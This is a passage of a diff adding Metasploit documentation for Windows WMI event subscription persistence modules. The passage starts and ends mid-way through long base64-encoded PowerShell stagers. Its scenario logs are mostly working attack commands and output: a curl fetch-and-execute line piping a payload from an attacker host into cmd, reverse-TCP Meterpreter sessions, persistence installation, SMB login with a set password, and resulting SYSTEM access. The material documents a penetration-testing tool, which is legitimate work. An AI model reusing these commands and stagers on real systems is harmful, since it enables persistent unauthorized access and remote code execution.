MAcgBhAGoARQBBAGkAMQAnACsAJwBCADcAdABwAHIANgBOADMAVQBXAFUANwBMACsAMwBVAGsASABIADMAbQBsADQATQAzAHcAegBTAFkAQQAxAGwAdwBJAHIAUQBIADMAeQAvAFQAWABvAG4AOABjAGgAbABUAHoATgBTAGwAQwAyAEYAUwB1AFEAbAB1AE0AVgAwAEsAcQBPAFEAZwBtADUAZABxAG0AVwBIAEsAKwBEAHEARgAnACsAJwAxAHMAZAB5AEUAOQBkAGwAUgBJADcAVwA2AHkAbQAvAEcANgA0AFkATQB3AE4AcABvAG4ALwA5AEIAdABjAGgANQAvACsATQA5AFoAaABMAFUAbwB3AEEAMgBhAHUAdwBTAGwAdQBNAEEAQgBzAFkAbQBkADcASwBIAFIAWABvAEMANQB1AEoAaABLAFEANABxAFIARwB3ADIAZQBJAHsAMgB9ADUAbgA5AEsARwBWAHcAQgBwAGsAWAB4AFIASwBVAFMAMQBUAEIAZAB7ADAAfQBKADEAMgBYAE0ANgBlADgARgB4ADUATABEAHoAKwA4AEEAQQBBAEEAewAxAH0AJwApAC0AZgAnAFAAJwAsACcAPQAnACwAJwBiACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Cleaning up 496 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcwBPAEgAVwBrAEMAQQA0AHQAMgB7ADEAfQBTAHYATABMAE0AcgBQAHkAMAAzAE4ASwAnACsAJwA0AG0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVABTADcAUgBEAFMANABwAHkAJwArACcAcwB4AEwAVgAvAEMAcwB7ADAAfQBBAHcASQBjAGcAdQBPAHEARgBHAHQAagBrAFkAMQBMAEIAaQByAFkAUgBvAHEAOABUAG8AcQBlAGEAVQA1AE8AVABwAFEAUQAyAHMAQgBqAHIAeQBZAFYASQBRAEEAQQBBAEEAPQAnACkALQBmACcAZAAnACwAJwB6ACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBhAFMAVwBPAFQAVABhAHAAJwA7AA== -InputFormat None +[+] Persistence installed! Call a shell using "smbclient \\\\2.2.2.2\\C$ -U BOB " +[+] or +[+] use auxiliary/scanner/smb/smb_login +[+] run SMBUser=BOB SMBPass= RHOSTS=2.2.2.2 +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251118.2636/WIN10PROLICENSE_20251118.2636.rc +``` + +Persistence Trigger + +``` +msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > use auxiliary/scanner/smb/smb_login +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session +msf auxiliary(scanner/smb/smb_login) > run SMBUser=BOB SMBPass=mess_with_the_best_die_like_the_rest RHOSTS=2.2.2.2 +[*] 2.2.2.2:445 - 2.2.2.2:445 - Starting SMB login bruteforce +[-] 2.2.2.2:445 - 2.2.2.2:445 - Failed: '.\BOB:mess_with_the_best_die_like_the_rest', +[*] 2.2.2.2:445 - Scanned 1 of 1 hosts (100% complete) +[*] 2.2.2.2:445 - Bruteforce completed, 0 credentials were successful. +[*] 2.2.2.2:445 - You can open an SMB session with these credentials and CreateSession set to true +[*] Auxiliary module execution completed +msf auxiliary(scanner/smb/smb_login) > +[*] Sending stage (188998 bytes) to 2.2.2.2 +[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50188) at 2025-11-18 19:28:43 -0500 + +msf auxiliary(scanner/smb/smb_login) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > +``` diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md new file mode 100644 index 0000000000000..0cc631315d3ef --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md @@ -0,0 +1,137 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter +that triggers the payload after the specified CALLBACK_INTERVAL. + +If the persistence is not installed, it will keep triggering payloads to spawn. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_interval` +4. Do: `set session #` +5. Do: `run` +6. Wait +7. You should get a shell. + +## Options + +### CALLBACK_INTERVAL + +Time between callbacks (In milliseconds). Default: `1_800_000` which is 30 minutes + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50187) at 2025-11-18 19:25:49 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > sysinfo +Computer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence Install + +``` +use exploit/windows/persistence/wmi/wmi_event_subscription_interval +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set CALLBACK_INTERVAL 60000 +CALLBACK_INTERVAL => 60000 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > exploit +[-] Exploit failed: cmd/linux/http/x64/meterpreter/reverse_tcp is not a compatible payload. +[*] Exploit completed, but no session was created. +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > run +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 2.2.2.2:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > [*] Installing Persistence... +[*] Powershell command length: 6851 +[-] Compressed size: 14384 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14384 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcQBtAEgAMgBrAHsAMgB9AEEANgBXAFoAUwAzAGYAYQAyAHAAYQBGAC8AMAByADEAVQBqAFgARwBiAFIAQQAvAGMAbgBOAHYAYgA4AHMAUwBnAG0ATQBFAEUAUwBCACcAKwAnADgAUgBJADEAcQBnAE8AQQB7ADEAfQB7ADIAfQBVADcASQBzAFIAMwBMADkAcQArAHYAKwBjADAAdABTAEUAWgAxAHkAeAAwAE4ANQBQADEAWQB6ADcAbgBtAFcAdgByAHYANwBQAHYAegBsADQAZgBqADkAMgAvADcANwAwAC8ALwA4ACsAOQAvAEwALwBaAFAAdgA3ADEAWQBiAFIANgArAGIATABiADMAKwAvADkAOABOADkARABmACsAKwBxAHYANQA2AGYATgBNAGMAdgBmAC8AZQBQAGQASAAyADAANABoAHUARgBqAGEATAByAGsAYQB4AGkATgB3ADYAWgBNAHUAagBBAHEAUQA5ADAAbQBqAHkASAAvAEcATwB7ADEAfQB1AGUAUQBqAEQAUQBaAGkAMQA0AFUAUABJAGkAOQB7ADIAfQAwAHkAWAAzAEkAcwA3AEEATABlAHQANgAwADQAVABZAGsAcwA1AEIAWABZAGQAZQBGAHAANQBCADkAWgBOAC8AZgAvAE4AYQArAFEAYgBnACcAKwAnAEoAewAxAH0AZQBxAFMANgB6AEEAcQA0AHYAcAA4AEUAewAyAH0AWgB0ADgAZwBmAHIAOQBGAHgAeQB6ACsAbQA4AGIAWgBrAHMAdgBLADkATQBEAGoAdwBiADUATQBxAHUAdwByAHAATQBMAHMAUABOAEkAewAyAH0AeQA3ADUARQB2AEkAagAvAHoAKwB5AHIANQB4AFkAUAA4AEIAdQBRAGUAcwAzADUAYgBoAFoAOABnAE8AVwBzAGUAegB7ADIAfQBOAHMAdQBlAFEAcQBqAEUATQAvAFgALwBWAHIAMwAnACsAJwBBADMAMgAyAEwAZgA5AHYAdwByADcAVgA3ADUASABsAEcANgB7ADIAfQAzAHoAdgAyAE0AZgBMAGYAaAAvADMAUAB2AGcASABWAFAAMwBLAE4ANwByADgAJwArACcAUABRAGUAcgAvADIAZQBqADEAaAByADAAbAAnACsAJwBJAHQAcgB6AGYAbAA4AGsAYgA1ADMAbgA5AHoAVgBVAHsAMQB9AHUAKwBRADUANQBGAGQAaABaADMAbgBIADcATgB1AEYAOQB7ADIAfQBpADcASgB6AG0ALwByAFUAOAAyADUAcAB3ADMAegBwAHUAMgBZAGYARAByAC8ASQBQADAAUwByADUASABmADAAagArAG0AeQBZAHMAZwB2ADQAdgB2AGYAZABkAGUAQQBtAGoAUQBTAGoATABwAEEAZwBqADIAMwBrAGMAVQB2AG0ANQBTADkASwBRAFoAWgB6AHoARwB7ADEAfQBiAEgAKwBMAHkAeAAvADYANgA1ADUAeQA1AHcAYgB4ADEAdQB1ADMAQQBkADgAdgBwADgAagB1AHgAMQBHAFkAWQBOAHoANQB6AHoAMQAxADMAaQAvAGMAcwBTAGUAWABnAGYASAByAHsAMgB9AC8ANwA5AE0AOQAyAHYAZgBLAHYAcQBaAE0AaABpAEUAdgBzAFoAdgBzAHcAdgAwADYAZAAvAFEAWQBpAGoATAA1AFYAeABpADEAWQBZADIAZQB3ADQAeAAxAC8AdwB4AHAARgB2ADQAcQBrAHoAWAA3AG0ANgBCADkAcwBwAFAAJwArACcAOABzAE8ARQBlADcAZgArAEUAdgBsAFAATwB6AFMAMwBmAGMAMABpAHIAVQBIAFQAeQBYADkAYQBHAFcAZABEADUAMABsAC8AdgB2ACsAUABuAGEAVQAnACsAJwBkAGMAbABXAEUAYgBpAE0AZQBQADYAUAAxAFAAegB2ADIAcgAxAFAAOQB2AEgAcwBNAGYAeABMAGYAaQA4AGEAJwArACcANgBWADMARwBrAFQATgBtADMAeQBrADMATwBxAGsARgB5AEUAcgBPAFIAWgBXAGsALwBzAGsAUgBiAGMAMgAzAEcALwAvAFAAYwBCAGUAVwBTAG4ATgBmAHYAVwA1AEkAdgBzAHQAUQBwAEIAZgBtADMAewAyAH0AcgBOAFEANQA4AHMAKwA2AGwATgAxAHkANQA5AE0ARwB1ACsANAA0AFAAdwAzAEkAKwBUADYATQBqAHQAegAzAGcAbgA4AFYAagB6AFYANQBVAEcAQgAvAG4AYgBNAE0AMAAnACsAJwBpAGUAVgBQAG0AVwA0AC8ATgAyAFAAdQA0AEEALwB7ADIAfQB0AFoAZgBoAEcARwBwADgALwBSACsAMgBNAHAAdQBlAGkALwA5AFQAdgBiAFcAdQBsAGYAcgAzAGMAcgBmAEkAOQB2AHQAZwB2AE4AbgA0AGEAegAzAE4AKwBKACcAKwAnADYANgB2AGcAZQBoAHoAbgB4AHAALwAwAFQAKwA2AFcAVgBQAFgAaABmAFkALwBkAFgAOABzAEwANgB5AE0ANgBTACsAeABQADYAewAyAH0AUwBjAHUATwBHAGYAUgB7ADEAfQBYAGMAbQBlAHkAZQBPAHQAegBYAHkARAB7ADEAfQA5AFIANwAyAEYALwAvAHIAewAyAH0ATwA4AFoAUQBlAHMAUAA5AG4AOQBrAG4AUABKADMANwBMAHYAOQArADQAdAB5AEEAdQBrAFMATwBjAC8ASwBQAHoAbABXAGUAMgBtAC8ASgBpAGkANQAyADAAYgBoAFcAUwBFAGYANgBaAEcAbABmAEcAawBsAGYANQBrAHQAWABZADkAUgBRADMASAAzAGcAcQAnACsAJwBuAGgAMgAzAFMALwB5AHsAMQB9ACsATgBHACsAQQAzADYANgB4AFEANgB5ADcANABaADQAagAvAGQALwBKADUAOABrADMAeABmAGsAdgBjAFUAdQBpAHMAKwB5AFYAWgA1AEoAVAB1AEYAWQBRAFIAeQBzACcAKwAnAGoAVwB0AHQASwBJAEwAaQBaAE8AUQA0AGUAKwBqAFAARwAvAFQAeAArADQARAA4AE8AKwBRAGUAQgB2AHgAMgBSAFYAdwAxADUARwB2ADIAUwBCAHgATgBrAEYAZgB4ADgANABZAGUAVQArAFEAYwA0AFcAKwBkAEoALwAvAEoAegBoAFgAdgBsAFUAOABIADcARgAyADMANABhAEsAUABWACsARgBZAGgAYgA5AGYAKwB2AGcAcwBmAEEAOQA1AEwAegB2AFUAbgBlAHkAdAA5AGMAcgByAGIAOQBoAHAAVwBTAHEAdQAwAGgAcQA5ACcAKwAnAEwAdABGAGYAZAB2AHsAMQB9AGUAaAB7ADEAfQBkAHcAQgA2ADYAbgB4AHsAMQB9AHMALwBpAFIALwBKADgAdwBIAC8ATwA3ADYARwAxAG0ATQBhAHMAaQBQADcAbgB2AEcAdgBmAHMAKwBNAGsAOAA3AEQAQQAzAGoAcwArAEYAcQBSAC8AeQBQADgASwBiAGsAVgBYAHkAdgBIAHIAZgBBAFQAdgBlAFMAdgBHAGUAYwBxADMAbQByAGkAVQB1AHUAbQA1AGQAbQAnACsAJwBmAG4ANAAwAHYASgBmAGwAVQA0AGUAOQBYAGMARwBLAE8ALwAzAFAATAArAHgAawA4AFgAdAB7ADEAfQB2AHgAewAxAH0AYwByADMAcQAvAFIASwAzAFAAOABqAGoAaQAzAEsATQBOADcALwBMAGsAbAAvAHUATgA1AEIAZgB7ADEAfQAxAFoAWQB4AFQAcgBjAC8ANwBmAFAAcgBLAHYAcQByAFYATwBTAG4ANQBrAFcAUQB4AG4AegBpAFAALwBOAFkANQA4AHMALwBjAC8AcQB6AEIANgB4ADgAaABKAFoAKwBJAHQANAB6AHoAYwAvAEoAVQA5AG4AcAB6AGYAUQBqAEoARQBiADgAMgBJAFQAaQBlAGwAQgA4AGoAZgBnAHQAMwBQAHYAUgA1ADkAQgBtADUAWgA5AFEANQA0AHcARAAzAEQASQBpAC8AYQAvAHcAbQBlADIAKwBJAHkAOABaADUAVgAvACcAKwAnAEQAKwBBAFQAdgBNAGYASgA3AGkAdABOAFYAKwB4AGMARwAwAGwARAB6AFMAYQA0AGUAYwBrAGwAZgAyAFAAUwBKAFAANAAvAHcAUABNAGEALwBBAE8AKwB3AHUATwBhAFQAUAB7ADIAfQBMAHYAdgB1AFUAZAA1AEkARABsAGQAeAA3AFgAKwBQAGYARwAxAGIANABXAFAAawB0AE4AMgBrAHIAMgByAFUAdgB1AFUAagB4AHYAdwBJAHUASwBLADgAVQBMADUALwBLAFcAMwBnAC8ATgBWACcAKwAnAGQAJwArACcAawBpAHQAZgA2AG4AbgB7ADIAfQBVAC8AUgB1ADYAVABlAGQANwBLAHIAMQBpAG0AdQBkADEAMQB5ADUAVABwAGUAUgBsAHkAVwBYAEkAdQArAC8AbABrAGYANABlADYAewAyAH0ANQA2AEoAVgBYAEUAWQBjAC8ASQBTADkAdABzAFQAWAA2AGQAegBVACsAegA0ADcAdgAxAHAAdwAxAGYASgBlADIATwA3AGcAaABPADYATABlAEYAaQBRAHAAMgAvAFUAaQBTAG4AMQB7ADIAfQB6AG4AUgBWACsAOABWAC8ANQAnACsAJwBzACsAMwB5AGYARQA4ADQAWQA0ACcAKwAnAE8ANQAwAFAAUAAyAGsAVgA1ADYAcgByAGkAdAA4ADEAdQBGAHgAMwBaAHgAdwA4ADQAcgBlAFYAKwBZAEQAegBLAHUAWAArAE4AZgBaAEkAbgBTAGMAegAvAEwAUQBNADIATgAxADQAZQArADMANwB3AE8ASABVADYAMQA3AEIAOQBTAGwANQBQAGoAVAB1AEgAOAAxAHYATwB2AEIAOQBIAE8AdABxAHgASgBrAEYALwBsAGYAZQBYAEIASgAvAHgAewAxAH0AbQBzAFEAcwA0AC8AOABmAGYAYwA5AGMAcwA0AGUAUgBmAHkAUgA4ADUANQA0ADcANQBiADgAbAAvAHkAcgAwAFAATQBhACsAUAB3AHkAUABqADUAcgA1ADUAdgA1AGMAYQBCAFUAcgB5AEUAZQB0AG0AcABYAGkAcgBlAHQAcABhAHoANQBkAHcAcAA5ADIAdgBmADMAOABqAFgAVQBKAC8AbAA5AHgAVgB4AHEAUABOADEAegBnADMAbgBMAHMAbABYADgATQBFADQAMABXAEQASABBAGoAdgBKAHIAaQAvAFkAVwBYADUAOAB4AE0AOQA3ADYAcAAzAHUAbABWAHcAbABjAGIAZwB7ADIAfQB2ADgARABwAE0AcwBxAHAAdgBMAHUATAA5AHEAJwArACcATAArAEgAWQBuAHIAZQAvAFQAYgBFAHEALwB7ADIAfQBFADkAdABQAGQAVQB0ADUATQBpAFkAUABsAEQAOAB2AGoAdAA5AFQAMwBUAEkAZgBmAE0AUgB2AEEAKwB3ADEANgAvADEAYQBtADEAYwAwADEATwBtAFQAMwAyAHIAeQBlADQAdgA5AGQAWgA3AHMAVgB7ADEAfQBOAC8AVQArAFMARQByADIARABuAHsAMQB9AFgAbgBkAEEAUAB2ADgAdwBYADcARgB3ADkASgB5AEgANQBEAC8AZwBOACsAYwBmADkAcABmADIAewAxAH0ANABmAHUAYQAvAHEANgAzAEEATgByAHAAagAzAEsAWQArAG4AagBnAC8AJwArACcAagAwAFcAUABQAGoAMQAvACcAKwAnAE4AOQArAEIAWgA1AEQAMQA1AG0ARAB2AC8AdgBuAEIAZgA0ADcAaQAwAEgAMAA3AHkAdQByADcAcQB2AG0AZgBzAHMAawBJACsAZQBCAHkANABLAFAAcwByAHoAewAxAH0AMQAzAFUAOQBlAHAARQBQAEYATABjAHEANQA0AHIALwBwAFMAdQB4ADYATABsAHgASgBQAEcAWAB3AEUAWABoAEQASQA0ADkAUAA1ADQANQA0AGYAMgBYADkANwA4AHoASAB5AEQANQB5AEQAWAA0AEkAegB2ACsAeQB3AEoAewAxAH0AOQB5ADgANgBwAHIALwBCAFgANQBuAE8AdgBjAFoAMwBCAGoAeQBlAC8AYwA4AFgAZABOAG4AcwB0AGYAZgA3AHMALwBhAEIAVwB2AEUAZABkAGYAdQBiAGMAQgBwADIATgA5AHEAcwBIAGYAVgBSAHQANQA2AGgAcAArAE8AcgBJAGUAOAArAGkAUAA1AHsAMgB9AEgAeQBTAGMANgAzAC8ANAAvAFkAZgBXAEgAOAByADYAZwBYAGIANgB4AGIAZABSAEcALwA2ADUASwA4AGEAZQBnAHIAcgBzAEgAOQB5AGoAdwAzAHsAMgB9ADMAUAB3AFEAWAA2AGYAdQBEADUAOQBoAEQAZgBmAGMAOQArAEUAdgBOAGEANQA4AHoATABxADAANwBoAE8ARABtAEsAZABrAFAANQBiAGUARQBoAHEAbgBQAHgASwBYAHEAaQB1AFQAWgBCAC8AJwArACcAagBuADEAMQBqACsAdQAnACsAJwBhAGMASwBVAGcAegA2AGoAYgBIAFgASABjADQANgBIAHMAWABUACcAKwAnAGoAZgBTADMAewAyAH0AZwBpAC8AVgBQAGUAUQBiAGYASQB1ADcAMABYAEIAewAxAH0ASAB3AEUASAB5AHcAWABGADMAJwArACcAUwAvAHgAdQArAGoAcQAxAHgAdwArAGoAWQA2AHoASAAxAEYAMwAwAHAAMAA3ADEAKwBHACsAYwBHAFkATABYADgASABSAHcASgBQAEsAdwBwAGUAdgBnAEEAUgB5ADUANwBPAHYAewAyAH0ARwAvAEkAcgB2AHkAcgB5AGUAZABuAFgAMwBXAGsAWAA0AC8AewAyAH0AJwArACcATwBlACsAawBYAFcAewAyAH0AOQA5AGwALwBEAE4AeQBOAE4AcgA4AGkAMwBLAFYAUgBIAHYAUAB6AGgASAA1ADkAMwBIAE8ARQBTACsARQB4ADgASAB0AC8AUQArAGgAVwBmAHEAZgBQACcAKwAnAE0AKwA3AHIAZQAnACsAJwAvAEwALwBwADgAMwBrAFIAYwBsAGQAMgB5AEwAdQBaAFQAYQB2AHQAZABZAE0AOABaAHUAewAyAH0AWgAvAGIAdgBGAGoAMQB0AGQAdAA0AGQAMABXACsAKwBzAGMAMgBlAEUAbgBkAGwAewAyAH0AZQBUAEsAMQAzAGkASAB5AHQAZwBHADgANQBQACsAQQB0AHIAdQBOAFgANgBMAFUAMgBYAHoATAAvAEgATABCAC8ANgBYAHgAeAAzAGIAaABBACcAKwAnAHoAewAxAH0AWAA1AGUANgBBAGUAJwArACcAZgBjAEIAdQByAHMAdgBTAHYAOABJAHYAKwBuADEATABmAGsAaQBQAFcAKwBxAFYAMwB0AGYAZwBqAG4ANQB2AGoAQQBkAGoANABzAGoANQB0ADQATgAvAEsAeAA4AHIAKwBJAEwAOABZAG4AKwBRAGoAegAzAC8AUAB1AEYAVQBBAGEANAB7ADEAfQBIAHAAYwA5AEgAdQB6AEEAVQBmAE0ANgBjAE8AewAxAH0AcQA2AHEAZQA4AG0AVgByAE8ATQBUAHkANQA2AFAAbgB5AG4AZgBsAHoAbgA4AGQAYgAvAEsALwAxAE0AMwB7ADIAfQBEAC8AagBwAEUAWABGAE0AOABUAHEAaQBIAHQANgA1AFgAZwBYAHEANwA0AFgAMABOAEwAOABEAHYANABGAFQAcQA5AFEAZgByAGEAWgA3AGoATwBqAFUAZwByADcAYgAwAE4AYgBuAGoATgBFAE4ATwB4AHgAKwA4AEEAUgA1AGkAMwBJAEoALwBTACsANgBTAGYAaQBhAEQAVgA3AGgAJwArACcAZQByAGQAeABuAEcAdgA5AEwAOQBGAGEAYwBQAEkATQBEADgAeQA3AGkAeQBZAFoANgBLAFgAeQA3AFEAMgA3AHQAVgA1AC8AMwB3ADMAMAB3AGYAaABkAGUATwBoADgAVgA1ADgASwBCAGIAKwA3AG4AUQBtAEkAZQBYAEYAQgBYAFgAVABlAEYAQgA1AEwAWABPAEsAbAA5AGMALwBkAFAAQQBUADAAdgB1AGIAOQB5ADMAOQBuAEgASQBmAEgAcQBlAGwAQgBIAFgARgBZADkAaQB2ADEASQBRADMAeABjAEkATgBlAHUAagBYAFYAMwB7ADIAfQBVACsAaQB2AHcAJwArACcAaQBKACsANgAyAHAAYwBXAGMAYwArAHgAVABGAHUAZgB2AFMAMAA3AGsAMwB4AHsAMQB9ADIAZQB2ADIATAAvAEQAUAB6AHAAYwBUAFQAVwA5ADkAMAB2ADMATAA3AHMAKwA3ADgAcgA5ACsAMQA5AEgASwB5AE0AUgAwAGYAdQB2ADcATwAnACsAJwBmAGYALwBVAHQAUAA2ADEALwAnACsAJwBTAEIATAAwAGkAWAB3ADIAUQA0ADQAZgAxAFAAZAA5AGkAUABKAHMASABJADkAWgB6ADUAUABOADUAMQBMADAATQBnADgAUwBuAHEAMgBJADgANgBIAHIANwBUADMAcgBKAE8ALwBTAC8AQgBBADgAQQBBAGQAewAyAH0AMQBFAC8ANABkAEUAdQBjAEwATgB0AFQASAB3ADcALwBHAG0ATgBQADkAMAAzAHUAewAyAH0AMgBXAFgAcQBmAGsARABkAGkAewAyAH0AdQBtAGwAaABYAFoAUAA4AFYAZgBRAGYAOQBsAGYAdQBXAGMAZQB6AC8AVQA4AHUAWgBJAG0AOABCAFgANABTAGYAbAA1AEUAJwArACcAWAAzAGIAbgBlAHQAcwBUAHYARgBlAHQAWAA0AEwAegBpAFkATgBMAHoAOQBTADMANwB3AEEAWABMAFgAZQBHAFAAewAyAH0AZQB1AG0AOQBnAHUANABoAE4AMwBwAGwAeABSAHYAOABBAHYAbQBGAHAAbgB6AE4AWQBYAG4AcgBlAEcAUAA0AHsAMgB9AEwAMwB5AHsAMQB9ADQAbAA5AGwAWgBjAHsAMgB9AGEAYwA4AEgAeQBuAEsAMgBBAGYAdQBxAE0AdgBEAEwAUABMAGgATQB6ACsARgBYADEAewAyAH0AMwBqAEIATgBMACcAKwAnADkATgBqAFMARAA1ADEANQBZAEEARQBPAFAAWgBCAEgAYwAzAGgAeABuAEoAdAA4AFIAWgA0AGQAYwB1AFQAdQAwADUANAA4AEIAMgBMAE8ARQBQAFYAOQA0AFQAawBGAEoAMQB4AHYANABhAGQAagA1AGkAdgB2AGUAVwA4AGMAVABwADMAZgBHAGYAcgB1ADQATABuAHkAZwArAEwAOQAxAHYAeQBLACsAYwBQADUAZgB2AFAAbgBBAFgAYQBhAHUAegA5ADgAagBIAHkATgB1AE0ARAArAHYAKwBHADgAZgBzACsATgBzADcAYgBiAFIAKwBSADYAMwArAFAAdwBHADMAWgB5AFgAdQBGAFAAMQA5ADIASwBmAHMAUgA0AFcATwBNAFgANAB4AFkAOAB7ADIAfQA1ADQAdAAvACsAUwBIAGEASwAvAGMAZgBoAGgAdwBuAHYAegBUAFkAWQA4AGQAYwA3AGoAYwA4ACcAKwAnAGYAeABnAEgAZwBoAGUAVQBPAGYASQB0ADgAeAAxADgAcwAvAGYAKwBkAE8AdAA4AFQAbQBBAEIAKwBaADkAZAArAEIAZQA1AHIAcAB2AHYAdQBBADYASwA3ADEAVQBmADcAcQB6ADMAewAxAH0AcQBYAHEAewAxAH0AeAAxAGYAewAxAH0ANQA5AE0AdQBaAFoAOABKACsATQBjADUANwA3AHUAcABqADIAOAA1AHgATAAxAHcAWAA0AHMALwBTAGMAbABaAEcAbgBPAGUANQBsAHAAOAByAHoARQB0AGYATABTACsAVABmAFkAdAArAFIAKwA1AG0AQgArAFIANQB6AHoATgBUAC8AZgAwAFkAUAB5AFoAOQBRAGoANgBaAGwANQBGAFUATAA4AEU